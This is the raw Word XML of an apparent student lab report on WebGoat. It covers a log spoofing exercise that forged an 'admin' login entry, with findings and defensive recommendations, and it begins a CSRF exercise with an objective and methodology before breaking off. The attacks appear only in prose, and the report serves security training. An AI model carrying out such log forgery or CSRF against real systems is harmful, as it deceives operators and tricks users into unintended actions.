        <w:t>Analyzed the content of log entries to identify sensitive information and potential security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61606662" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attempted log spoofing attacks to manipulate log entries and make it seem like the username "admin" successfully logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A44B569" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Examined the log storage and retention policies to identify any weaknesses in data protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F067FE" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Documented key steps and findings with screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734E707" w14:textId="77777777" w:rsidR="00211DD7" w:rsidRDefault="00211DD7" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D255DD" w14:textId="66369667" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534C9EA" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7532EC8C" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Logging Vulnerabilities Identified: Discovered potential vulnerabilities such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9AF32" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Inclusion of sensitive information in log entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B2E011" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Successful log spoofing attacks, making it appear as if the username "admin" logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AA9EB" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Data or Access Gained: Demonstrated the impact of log manipulation, achieving the goal of making it seem like the username "admin" successfully logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6965699F" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes: Illustrates the significance of secure logging practices in protecting sensitive information and maintaining the integrity of log data. Specifically, log spoofing attacks can deceive the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2776F7" w14:textId="77777777" w:rsidR="00211DD7" w:rsidRDefault="00211DD7" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7291DD03" w14:textId="0B4B91DD" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D8BDA4" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F018A9" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise highlights the importance of robust logging security practices to prevent log spoofing attacks. Log entries should be resistant to manipulation to maintain the trustworthiness of the system logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EF14AA" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF88E9A" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1683A9C7" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5414E61F" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement proper input validation and sanitization for log entries to prevent log spoofing attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD2142" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exclude sensitive information from being logged to avoid exposure of critical data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881AD55" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enforce secure storage and retention policies for logs to maintain data privacy and compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF3184" w14:textId="77777777" w:rsidR="00211DD7" w:rsidRDefault="00211DD7" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E34CE0" w14:textId="26E34C34" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480913A7" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F43C530" w14:textId="5E8FBDF3" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The logging security assessment provided valuable insights into potential risks associated with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging mechanisms, with a focus on log spoofing attacks. Future assessments should continue to explore and address such vulnerabilities to enhance overall system security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F07BE9" w14:textId="09352AD5" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CE5955" w14:textId="4E2D06E2" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845FADB" w14:textId="45040E03" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB56977" w14:textId="38C40B84" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Browser Development Tools Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BE620" w14:textId="5EC1ED82" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB59A9" w14:textId="292BA8C3" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2D3854" w14:textId="75F54656" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1424D001" w14:textId="2AC1B9C3" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057C8F2B" w14:textId="79C1F3D3" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAB5431" w14:textId="20B3CFAE" w:rsidR="006A6A5B" w:rsidRDefault="008561B8" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="155ECD96" wp14:editId="2D32FA96">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3973195</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>4495165</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1424940" cy="1067435"/>
            <wp:effectExtent l="952" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="55589829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98292"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16200000" flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="1424940" cy="1067435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0075524B">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="539E5472" wp14:editId="6C171E11">
            <wp:extent cx="1938911" cy="1454183"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1155082935" name="Picture 2" descr="A computer screen with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82935" name="Picture 2" descr="A computer screen with a login p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9500" cy="1492125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B36639">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="315E774F" wp14:editId="41B95EAF">
            <wp:extent cx="1939357" cy="1454518"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="1895476546" name="Picture 3" descr="A computer screen with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76546" name="Picture 3" descr="A computer screen with a mess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2874" cy="1502156"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E22F5E">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6245A5C9" wp14:editId="0C60C8D6">
            <wp:extent cx="1963471" cy="1472604"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="880395259" name="Picture 4"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95259" name="Picture 4" descr="A computer screen with text on i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7907" cy="1520931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C30C55" w14:textId="0EE7BFAC" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2F2E47" w14:textId="08639622" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2F453A" w14:textId="3D002E7E" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC156BF" w14:textId="57440B62" w:rsidR="001B7F9B" w:rsidRDefault="001B7F9B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29008DBF" w14:textId="3116AF2B" w:rsidR="001B7F9B" w:rsidRDefault="001B7F9B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D175314" w14:textId="0A1CF0D8" w:rsidR="001B7F9B" w:rsidRDefault="001B7F9B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76170C76" w14:textId="2AA52DC9" w:rsidR="006035FE" w:rsidRDefault="006035FE" w:rsidP="006035FE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3151D83D" w14:textId="57F8E02E" w:rsidR="006035FE" w:rsidRDefault="006035FE" w:rsidP="006035FE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01060BDE" w14:textId="249FBC3C" w:rsidR="006035FE" w:rsidRDefault="006035FE" w:rsidP="006035FE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1812ACCD" w14:textId="25AC97F4" w:rsidR="001B7F9B" w:rsidRPr="006035FE" w:rsidRDefault="001B7F9B" w:rsidP="006035FE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006035FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 </w:t>
      </w:r>
      <w:r w:rsidR="00B71190" w:rsidRPr="006035FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Server-Side</w:t>
      </w:r>
      <w:r w:rsidRPr="006035FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BC977" w14:textId="076FEBBE" w:rsidR="001B7F9B" w:rsidRPr="006035FE" w:rsidRDefault="0007639D" w:rsidP="006035FE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006035FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Request </w:t>
      </w:r>
      <w:r w:rsidR="006036B7" w:rsidRPr="006035FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Forgeries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0438DF" w14:textId="039A7055" w:rsidR="0007639D" w:rsidRDefault="0007639D" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2615C764" w14:textId="5A96A786" w:rsidR="0007639D" w:rsidRDefault="0007639D" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6AD5EB" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title: Exploiting Cross-Site Request Forgery (CSRF) with Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D55BD" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEF046E" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E89E8D2" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The objective of this exercise is to simulate and understand CSRF attacks by leveraging browser developer tools. Participants will explore how attackers can manipulate HTML and utilize hidden fields to craft malicious requests, tricking users into unintended actions on a vulnerable web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB599AE" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D57670" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D7270" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This exercise involves using browser developer tools to modify HTML code and simulate a CSRF attack on a target web application. Participants will manually craft malicious requests, exploit the CSRF vulnerability, and manipulate user actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C2507" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45755E6D" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
